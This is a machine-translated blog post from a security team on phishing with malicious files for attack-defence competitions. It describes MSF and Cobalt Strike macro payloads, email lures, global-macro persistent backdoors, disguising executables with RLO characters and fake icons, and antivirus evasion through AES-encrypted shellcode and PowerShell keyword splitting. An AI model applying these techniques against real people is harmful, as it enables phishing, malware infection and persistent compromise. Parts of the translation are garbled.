Shandong new trend information
Professional focus excellence safety
Statement: original article of tide security team, reprint please state the source! The technologies, ideas and tools involved in this article are only for learning and exchange for safety purposes, and no one is allowed to use them for illegal purposes and profit purposes, or the consequences will be borne by themselves!
*Author of this article: promise @ tidesec, reprint please state the source.
This year, I participated in several net protection competitions. Other teams scored a lot of points by relying on social workers' combination of documents. I didn't accumulate relevant knowledge before, so I suffered some losses in this respect.
Macro is a special function designed by Microsoft for its office package. It has a unique file suffix, such as xlsm, DOCM, pptm, etc.
1. MSF generates payload
-F specifies the attack of generating VBA macro language. First, create a new office file that supports file macro, and demonstrate it with. DOCM. First, select file options Customize Ribbon development tools. Click the macro button to create a new file macro. Copy the macro code generated by MSF into the code box. Save the file and make a bounce file of MSF. MSF turns on listening. Open the generated 1.docm document. When a security warning appears, the promotion macro is disabled. Click enable content. Successfully launched.
2、 CS generates payload
CS also supports the generation of office macro code. Select a listener to copy the code directly to the macro code box. Go online successfully.
actual combat
Similar to office macro, there are some other ways to use it, such as injecting docx document remote template into executive macro, and using shellcode to avoid killing. In the actual combat, first of all, we should try our best to obtain the trust of the other party, modify the name of the document according to the fishing target, and send it through the email, such as XX company's purchase instructions.
There are several inapplicability of office macro fishing:
1. The other party's computer does not use office.
2. Office disables macros by default, and prompts you when you open a file.
3. Unique macro file suffixes, DOCM, xlsm, etc., are easy to cause suspicion.
4. The requirement of anti killing is high.
Global macro creates persistent backdoor
In addition to fishing, Office macros can also be used to build hidden persistent backdoors. Create a new macro in which you want to select all active templates and documents. Write macro code in thisdocument and save it. A hidden persistence back door was built successfully. Opening any document can trigger macro code, and killing software has no response.
Executable EXE file
Both MSF and CS can generate bounce Trojans, which can be triggered by mouse clicking. Exe trojan is used for fishing. There are three main problems to be solved:
1. Suffix hidden
2. File icon change
3. Document exemption
Suffix hidden
https://null-byte.wonderhowto.com/how-to/hide-virus-inside-fake-picture-0168183/
Classic ". Jpg. Exe"
By default, windows hides known file extensions.
Use. SCR extension
SCR is equivalent to the EXE suffix.
Unitrix inversion suffix
Change the file name to: important data xgpj.scr, select RLO to reverse before moving the cursor to g. Successfully hidden suffix. After testing, using the extension of. SCR and the suffix of unitrix inversion will be reported by 360 directly.
File icon change
Use restorer to make icon changes to the EXE file. Drag the Trojan file and the target exe you want to replace into the software. Drag the 360 icon to aaa.exe, save the file, and replace the icon successfully.
File free
Two kinds of killing free postures are introduced.
Avlator exemption
Download the portal a backdoor generator utility that uses encryption and injection techniques to bypass soft kill detection, and comes with rtlo and icon change features. Using AES encryption to encrypt a given shellcode to generate an executable file containing the encryption payload. Using various injection technologies, shellcode is decrypted and injected into the target system. There are three forms: the text of the encryption key used to encrypt shellcode, the text of IV encrypted by AES and the text of shellcode. The left side of the program gives the steps of using the MSF framework. This time, CS is used for demonstration.
1. Generate C ා payload2, keep hex, use Notepad + + to remove the space 3, copy to the payloadbox for encryption 4, you can choose to reverse the suffix (it will be identified as malware by some anti-virus), replace the icon, choose injection technology, and successfully generate the file. Can bypass most of the kill soft. This machine perfectly bypasses 360 dynamic and static killing.
PowerShell kill free
At present, the killing ability of each killing software to PowerShell is not strong.
Idea of avoiding killing: first find the PowerShell payload, execute functions through other language system commands, call PowerShell, and finally package it into exe. Use the payload generated automatically by CS.
The next purpose is to avoid killing the executed PowerShell statements. A lot of ideas are the same as that of webshell. To bypass keyword detection, you need to try it by yourself. Here is a kind of PowerShell kill free.
Keyword splitting is not allowed
Before splitting:
After testing, the downloadstring is detected and split. After splitting up:
Successful bypass kill soft. The detection of other keywords can be bypassed by this method. Use the system function of C language to execute PowerShell.
Compiled into exe file, 180KB size. Most of them don't report poison. After running, it will be successfully launched, leaving a black window. You can use - W hidden to hide execution, but hidden will report poison. You can try to split hidden to bypass. There are many things PowerShell can do, such as the right of hands-free killing, and more ways to use it.
summary
Whether it's a macro file or a phishing Trojan, a successful file phishing can't be separated from social engineering. How to gain trust from others quickly is the difficulty. Unsolved problem: bypass the real file suffix hidden by assassin soft. If you have ideas, you can contact me ~
E
N
D
Gu n
shut
Zh
notes
W
I
Men
People
Tide security team was formally established in January 2019. It is a security team under the banner of new information, aiming at the research of Internet attack and defense technology. At present, it has gathered more than ten professional security attack and defense technology researchers, focusing on network attack and defense, web security, mobile terminals, security development, IOT / Internet of things / industrial control security and other directions.
For more Tide security teams, please pay attention to team official website: http://www.TideSec.com or long by two-dimensional code, pay attention to official account number: